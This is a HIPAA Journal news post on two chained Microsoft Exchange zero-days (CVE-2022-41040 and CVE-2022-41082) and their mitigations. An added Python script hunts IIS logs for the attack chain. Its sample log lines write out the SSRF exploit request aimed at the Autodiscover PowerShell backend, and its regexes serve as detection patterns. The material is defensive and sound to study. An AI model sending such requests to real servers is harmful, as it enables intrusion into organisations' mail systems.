The post Cybersecurity Awareness Month Focuses on 4 Key Behaviors appeared first on HIPAA Journal.

Zero Day Microsoft Exchange Server Vulnerabilities Being Actively Exploited

Microsoft has warned that two zero-day vulnerabilities in Microsoft Exchange Server are being actively exploited in the wild and has shared mitigations ahead of the vulnerabilities being patched.

The two flaws are being chained together and are being exploited by a Chinese threat actor. The attacks have been limited so far, but the healthcare and public health sector in the United States could potentially be a target.

The flaws affect Microsoft Exchange Server 2013, 2016, and 2019. CVE-2022-41040 is a server-side request forgery (SSRF) vulnerability that can be exploited for initial access, after which the second vulnerability, a remote code execution flaw tracked as CVE-2022-41082, can be exploited. The second vulnerability can only be exploited if PowerShell is accessible to the attacker.

Microsoft has confirmed that the flaws cannot be exploited by an unauthenticated attacker. Both vulnerabilities require authenticated access to a vulnerable Microsoft Exchange Server, such as with valid stolen credentials. The first vulnerability has been assigned a CVSS severity score of 8.8 out of 10 and the second a CVSS score of 6.3. Once the flaws are exploited, a threat actor can deploy a backdoor for persistent access; in some of the attacks the China Chopper web shell has been deployed for this purpose, which suggests the flaws are being exploited by a state-sponsored Chinese hacking group.

Microsoft says it is working on patches for the flaws on an accelerated timeline and has shared mitigations that can be implemented by users of on-premises Microsoft Exchange Servers ahead of the patches being released. Microsoft said it has implemented detection rules for Microsoft Exchange Online and has mitigations in place to protect customers, so Exchange Online customers do not need to take any action to prevent exploitation of the flaws.

Customers with on-premises Microsoft Exchange Servers can add a blocking rule in IIS Manager (Default Web Site -> URL Rewrite -> Actions) that blocks the known attack pattern; the rule and the steps for adding it are detailed in the Microsoft Security Response Center blog. Since the remote code execution step depends on the attacker reaching PowerShell, Microsoft also recommends restricting remote PowerShell access for non-administrative users. Because the rewrite rule is a pattern match, it should be treated as a stopgap until the patches are applied, and servers should be checked for signs that the flaws were exploited before the rule was put in place.
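As an added example, not code from HIPAA Journal or Microsoft, the following script hunts IIS logs for the request chain the two CVEs are exploited through: a request to the Autodiscover endpoint whose query string references the PowerShell backend. It parses the IIS W3C extended log format by reading the `#Fields:` header, so it copes with the column order differing between servers. The two regular expressions are illustrative indicators chosen from the public description of the chain, not Microsoft's published pattern, and the log lines are constructed for the demonstration.

```python
"""Hunt IIS W3C logs for the Exchange Autodiscover-to-PowerShell request chain.

Added example, not code from HIPAA Journal or Microsoft. It parses the IIS W3C
extended log format (the '#Fields:' header names the columns, which differ
between servers) and flags requests to autodiscover.json whose query string
references the PowerShell backend, the chain the two CVEs above are exploited
through. Assumptions: the regexes below are illustrative indicators, not
Microsoft's published pattern, and the log lines are constructed for the demo.
"""
import re
from collections import Counter
from typing import Dict, Iterable, Iterator, List

STEM_RE = re.compile(r"autodiscover\.json", re.IGNORECASE)   # assumed indicator
QUERY_RE = re.compile(r"powershell", re.IGNORECASE)          # assumed indicator

# Constructed sample log (IIS encodes spaces inside a field as '+', so a plain split works).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2022-09-30 10:15:01 10.0.0.5 POST /autodiscover/autodiscover.json @example.test/powershell&Email=autodiscover/autodiscover.json%3f@example.test 443 contoso\jdoe 203.0.113.7 Mozilla/5.0 - 200 0 0 125
2022-09-30 10:15:03 10.0.0.5 GET /owa/ - 443 - 198.51.100.9 Mozilla/5.0 - 200 0 0 31
2022-09-30 10:16:10 10.0.0.5 POST /autodiscover/autodiscover.json @example.test/powershell&Email=autodiscover/autodiscover.json%3f@example.test 443 - 203.0.113.7 Mozilla/5.0 - 401 1 0 12
2022-09-30 10:17:45 10.0.0.5 POST /autodiscover/autodiscover.json - 443 contoso\asmith 192.0.2.20 Outlook/16.0 - 200 0 0 40
"""


def parse_w3c(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per request, keyed by the names in the most recent '#Fields:' header."""
    fields: List[str] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # header may repeat mid-file when IIS restarts
            continue
        if not line or line.startswith("#"):
            continue
        if not fields:
            continue                       # data before any header: columns unknown, skip
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                       # truncated or malformed line
        yield dict(zip(fields, parts))


def hunt(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return the requests matching the indicator, with a verdict per request."""
    hits = []
    for rec in parse_w3c(lines):
        if not STEM_RE.search(rec.get("cs-uri-stem", "")):
            continue
        if not QUERY_RE.search(rec.get("cs-uri-query", "")):
            continue
        status = rec.get("sc-status", "")
        hits.append({
            "when": rec.get("date", "") + " " + rec.get("time", ""),
            "client": rec.get("c-ip", ""),
            "user": rec.get("cs-username", "-"),
            "status": status,
            # A 200 on this path means the backend accepted the request; anything
            # else is still an attempt worth tracking by source address.
            "verdict": "likely success" if status == "200" else "attempt",
        })
    return hits


def attempts_by_client(hits: List[Dict[str, str]]) -> Counter:
    """Count matching requests per client address, successful or not."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG.splitlines())
    for h in found:
        print(h)
    print(dict(attempts_by_client(found)))
```

Against real servers, pass each file under the IIS log directory (`inetpub\logs\LogFiles\W3SVC*` by default) to `hunt()` as an open file object, and review every "likely success" hit for a follow-on web shell drop in the Exchange or IIS directories. The fourth sample line, a legitimate Autodiscover request with no PowerShell reference, shows why the stem match alone is not enough to alert on.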

The post Zero Day Microsoft Exchange Server Vulnerabilities Being Actively Exploited appeared first on HIPAA Journal.